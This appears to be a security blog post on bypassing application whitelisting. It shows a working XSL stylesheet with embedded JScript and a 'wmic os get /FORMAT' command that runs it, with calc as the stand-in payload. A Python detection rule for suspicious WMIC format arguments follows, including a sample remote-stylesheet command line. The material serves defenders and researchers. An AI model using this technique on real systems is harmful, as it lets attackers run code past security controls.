Application Whitelisting Bypass with WMIC and XSL

Polaris

Another application whitelist bypass technique discovered by Casey @subTee, similar to squiblydoo.

Execution
Define the XSL file containing the JScript payload:

Code:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]> </ms:script>
</stylesheet>

Invoke any wmic command now and specify /format pointing to the evil.xsl:

Code:
wmic os get /FORMAT:"evil.xsl"

[Screenshot from 2019-04-10 22-05-24.png]

Observation

Calculator is spawned by svchost.exe:

[Screenshot from 2019-04-10 21-57-52.png]
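From the defender's side, the command line in the post is the most visible artifact: a legitimate wmic invocation uses one of the built-in /format keywords (csv, list, htable, ...), whereas the technique above passes an explicit .xsl file, a path or a URL. The following detection sketch is an added example written for this page, not code from the post or from @subTee; it runs over a few constructed Sysmon-style process-creation events and flags wmic.exe launches whose /format value is not a built-in keyword. The BUILTIN_FORMATS set is an assumption to be adjusted to your own baseline.

```python
import re
from typing import Dict, List

# Sample process-creation events in a Sysmon Event ID 1 style. These are
# constructed for the example and are not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /FORMAT:"evil.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process list /format:csv"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic os get /format:"https://example.invalid/p.xsl"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]

# Format keywords WMIC resolves to its own stylesheets under
# %SystemRoot%\System32\wbem. Assumption: extend this to match your baseline.
BUILTIN_FORMATS = {
    "list", "csv", "hform", "htable", "mof", "rawxml", "table", "value",
    "xml", "texttable", "textvaluelist",
}

# Matches /format:VALUE with or without quotes, case-insensitively.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def classify(event: Dict[str, str]) -> Dict[str, object]:
    """Decide whether a process-creation event looks like WMIC loading a
    caller-supplied XSL, and return the reasons behind the verdict."""
    reasons: List[str] = []
    image = event.get("Image", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")

    # Only wmic.exe launches are in scope for this rule.
    if image != "wmic.exe":
        return {"suspicious": False, "reasons": reasons}

    m = FORMAT_RE.search(cmdline)
    if not m:
        return {"suspicious": False, "reasons": reasons}

    fmt = m.group(1).strip().lower()
    if fmt in BUILTIN_FORMATS:
        return {"suspicious": False, "reasons": reasons}

    reasons.append(f"/format value {fmt!r} is not a built-in WMIC format keyword")
    if fmt.endswith(".xsl"):
        reasons.append("explicit .xsl stylesheet supplied on the command line")
    if "://" in fmt:
        reasons.append("stylesheet fetched from a remote location")
    if "\\" in fmt or "/" in fmt:
        reasons.append("stylesheet referenced by path rather than keyword")
    return {"suspicious": True, "reasons": reasons}


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events the rule flags."""
    return [e["CommandLine"] for e in events if classify(e)["suspicious"]]


if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print("suspicious:", line)
```

Pair this with parent/child telemetry: the post notes that the calculator does not appear as a child of wmic.exe, so a rule keyed only on "wmic.exe spawns X" would miss it, which is why the command line itself is the better hook here.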